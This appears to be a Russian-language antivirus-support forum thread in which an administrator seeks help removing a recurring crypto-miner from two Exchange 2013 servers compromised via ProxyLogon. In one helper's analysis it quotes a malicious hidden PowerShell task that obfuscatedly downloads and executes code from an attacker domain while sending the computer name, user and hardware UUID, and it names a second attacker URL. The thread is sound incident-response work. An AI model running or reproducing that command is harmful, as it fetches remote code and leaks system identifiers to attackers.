Выбрать дату в календареВыбрать дату в календаре

запуск майнера на серверах с MS Exchange 2013
На обоих серверах запускается. Но мы так же смотрим про ПроксиЛогон уязвимость, и пытаемся исправить всякими скриптами повершела и т.п. Но зараза запускается снова и снова. Иногда, очень редко, запускается на одном из двух серверов, а на втором нет. У меня вообще подозрения что команда запуска идет из вне, т.е. доступ запуска всё еще остался некий доступ. Хоть мы и поставили все обновления, заплатки от майкрософта.
Очень правильно что посоветовали программу для слежки, конечно же сейчас сделаю. У меня как раз был этот вопрос.
Скрипты сделал на двух серверах.
запуск майнера на серверах с MS Exchange 2013
[I]пришлите карантин этих файлов прислать в почту [/I][URL=mailto:safety@chklst.ru][I]safety@chklst.ru[/I][/URL][I] в архиве с паролем infected[/I]
Можете рассказать как это делать в малвербайте? Отчет нашел как отправить, а сам карантин не вижу где это делается в программе. На сайте нашел только это [URL=https://forum.esetnod32.ru/forum9/topic10688/]https://forum.esetnod32.ru/forum9/topic10688/[/URL]
Пока не скрипт не выполнял.
Сегодня снова майнингИ были. Сделал образ двух дисков. Отправляю.
Изменено: Владимир Шариков - 30.07.2021 11:01:38
запуск майнера на серверах с MS Exchange 2013
В общем самодеятельность моего начальника привела к тому что, он самостоятельно, без моего ведома, запустил Малвербайт на этих серверах.
Правда это дало результат, сегодня всё в нормальном состоянии... Скинул на всякий случай отчет из него. Но зараза возможно что снова прилетит?
запуск майнера на серверах с MS Exchange 2013
Эх!!! Только закрыл процесс на двух серверах, т.к. люди работать не могут, после прочитал... Запускается в 2:30 каждый день, как самостоятельно его запустить не знаю, завтра утром сделаю. Можно время перевести вперед попытаться, но боюсь что на экчандже проблемы будут.
запуск майнера на серверах с MS Exchange 2013
Здравствуйте.
Собственно снова вирусы на двух MS Exchange 2013. В скриншоте показал строку c бякой.
Файл WACS.EXE нормальный, используется для сертификатов ssl.
Помогите отыскать заразу.
запуск майнера на серверах с MS Exchange 2013, ProxyLogon
[QUOTE]santy написал:
если будет возможность перегрузить сервера,
выполните в uVS вначале твик 39, потом перегрузить систему, потом еще раз снять в uVS образы автозапуска, для проверки,
возможно получиться увидеть, кто  эти задачи создает.
(при условии, конечно, если они будут воссозданы)

  [/QUOTE]
твик 39 что то найти не могу, найду.
Еще вопрос. По той же проблеме. После этой бяки вот такое вылетает у пользователей (см. скриншот)
Изменено: Владимир Шариков - 17.03.2021 18:17:11
запуск майнера на серверах с MS Exchange 2013, ProxyLogon
[QUOTE]santy написал:
[QUOTE] Владимир Шариков написал:
[QUOTE] santy написал:
[QUOTE] Владимир Шариков написал:
Положу сюда сразу два образа двух серверов.[/QUOTE]
можно и второй образ положить[/QUOTE]
[/QUOTE]
по второму серверу:
это нормальный софт?
C:\PROGRAM FILES\WIN-ACME\WACS.EXE
--RENEW --BASEURI "[URL=HTTPS://ACME-V02.API.LETSENCRYPT.ORG/"]HTTPS://ACME-V02.API.LETSENCRYPT.ORG/&quot[/URL];[/QUOTE]
Да, это сертификаты обновляет.
запуск майнера на серверах с MS Exchange 2013, ProxyLogon
[QUOTE]santy написал:
[QUOTE] Владимир Шариков написал:
Положу сюда сразу два образа двух серверов.[/QUOTE]
можно и второй образ положить[/QUOTE]
запуск майнера на серверах с MS Exchange 2013, ProxyLogon
[QUOTE]santy написал:
сервер можно будет перегрузить (скриптом)?[/QUOTE]
Через пол часа можно будет.
[QUOTE]santy написал:
[QUOTE] Владимир Шариков написал:
Что этот код делает? Стоит ли боятся "Последствий" этой бяки?[/QUOTE]
шифрованный код. понятно, что расшифровывается на вашей системе, или наоборот в зашифрованном виде уходит в сеть[/QUOTE]
Как его возможно расшифровать? Нужно понять что хакер хотел добиться. Как мы поняли хекер воспользовался уявимостью, при обращение к екчанджу происходит срабатывания нескольких скриптов (каких мы не знаем). Но заметили что меняются ДНСы сервера.
[QUOTE]santy написал:
есть задачи, через которые возможно пытаются перехватить пароли.
[QUOTE]C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
-W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))))[/QUOTE]
[/QUOTE]
Вот это слово "Возможно" пугает ))) Тут как я понимаю срабатывает Имя ПК, Индефикатор, и имя пользователя.
запуск майнера на серверах с MS Exchange 2013, ProxyLogon
Вот это не ясно [URL=http://t.netcatkit.com/a.jsp?_20210317][S]http://t.netcatkit.com/a.jsp?_20210317[/S][/URL][S]?[/S] :
Скрытый текст
Что этот код делает? Стоит ли боятся "Последствий" этой бяки?